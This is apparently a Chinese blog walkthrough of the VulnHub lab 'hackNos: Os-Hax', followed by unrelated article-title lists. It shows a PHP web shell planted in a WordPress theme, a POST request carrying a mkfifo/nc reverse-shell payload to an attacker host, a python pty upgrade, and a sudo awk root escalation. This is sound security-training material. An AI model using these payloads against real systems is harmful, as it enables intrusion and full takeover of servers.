Os-Hax

下载地址:hackNos: Os-Hax ~ VulnHub

1 信息收集

1.1 端口扫描

1.2 后台目录扫描

Target: http://192.168.0.3/

[10:31:44] Starting:
[10:31:58] 200 - 736B - /html/
[10:31:58] 200 - 3KB - /index.html
[10:31:59] 200 - 2KB - /js/
[10:32:12] 200 - 11KB - /wordpress/
[10:32:12] 200 - 3KB - /wordpress/wp-login.php

1.2.1 目录分析

  1. 根据扫描出来的目标,得知该网站使用了wordpress,使用wpscan扫描下:

    发现一个XML-RPC_Pingback_API的漏洞

  2. 存在目录列表漏洞,在http://192.168.0.3/img/目录下发现flag信息

  3. 下载下来分析:发现存在passw@45

    分析软件下载:ExifTool by Phil Harvey

  4. 在博客页面中发现一个web用户

  5. 尝试使用web密码登陆失败,尝试访问http://192.168.0.3/passw@45/,得到flag2.txt

    i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
    >--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
    +++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
    ----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.< # 解密后字符
    web:Hacker@4514

    解密网站:Brainfuck/Ook! Obfuscation/Encoding splitbrain.org

  6. 根据http://192.168.0.3/passw@45/hostconfigure.txt配置kali的hosts

    cat /etc/hosts
    #127.0.0.1 localhost
    192.168.0.3 localhost
    127.0.1.1 kali # The following lines are desirable for IPv6 capable hosts
    #::1 localhost ip6-localhost ip6-loopback
  7. 尝试使用解密的用户密码登陆wordpress后台:http://localhost/wordpress/wp-login.php成功进入后台页面。

  8. 在正在使用的模板页面中插入php一句话

    # 如在header模板中:
    <?php system($_POST['acmd']); ?>

2 反弹Shell

  1. kali监听nc连接

    nc -nvlp 2333
  2. 利用BP反弹shell

    POST /wordpress/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117 acmd=rm+/tmp/getshell%3bmkfifo+/tmp/getshell%3bcat+/tmp/getshell|/bin/sh+-i+2>%261|nc+192.168.0.2+2333+>/tmp/getshell

  3. 利用python更换shell

    python -c "import pty;pty.spawn('/bin/bash')"

3 提权

3.1 尝试提权

  1. 利用sudo提权:失败

    sudo su -

3.2 收集当前系统信息

  1. 查看目标主机有哪些用户:存在user-a与web用户

  2. 查看每个用户家目录所存在的文件:web家目录中存在flag3.txt文件,user-a有sudo权限

  3. 在web家目录下找到flag3.txt

    40740735d446c27cd551f890030f7c75
    # Rahul[空格]James
    Rahul James

  4. 尝试登录web用户:利用之前收集到的用户与密码成功登录web:Hacker@4514

  5. 尝试sudo提权:失败

  6. 查看web所拥有的权限:awk

3.3 利用sudo awk提权

sudo awk 'BEGIN {system("/bin/bash")}'

最新文章

  1. echarts学习总结
  2. 两种遍历list
  3. Mybatis-Spring集成
  4. android 内存查看的不同数据指标
  5. SQL 行列转换简单示例
  6. 获取ip
  7. 第三节 构造一个简单的Linux系统MenuOS——20135203齐岳
  8. postgresql基本操作:查看数据库、索引、表、表空间大小
  9. java.io.IOException: ORA-22920: 未锁定含有 LOB 值的行
  10. HDU-1060(简单数学)
  11. CCIE路由实验(5) -- BGP负载均衡
  12. 修改/etc/resolv.conf又恢复到原来的状态?[转]
  13. 《并行程序设计导论》——Pthreads
  14. 前端-----js
  15. Retrieving archetypes
  16. 前端开发面试题-CSS(转载)
  17. Ubuntu 14.04服务器配置 (1) 安装和配置
  18. ubuntu安装cocos2dx
  19. fs-extra 文件管理
  20. 记一次java内存溢出的解决过程

热门文章

  1. day08 final关键字&amp;面向对象——多态&amp;抽象类、方法&amp;向上、向下转型
  2. 【开发必备】单点登录,清除了cookie,页面还保持登录状态?
  3. 【每日一题】【找到位置返回&amp;升序数组中第K大就是n-K小】2022年1月17日-NC88 寻找第K大
  4. 【每日一题】2021年12月14日-82. 删除排序链表中的重复元素 II
  5. Python免杀过360
  6. C语言 根据掩码计算网段的起止ip
  7. Django(1) - 初识Django框架
  8. [常用工具] PyAutoGUI使用教程
  9. [编程基础] 常用html标签使用介绍
  10. 问一个 Windows 窗口的 Capture 问题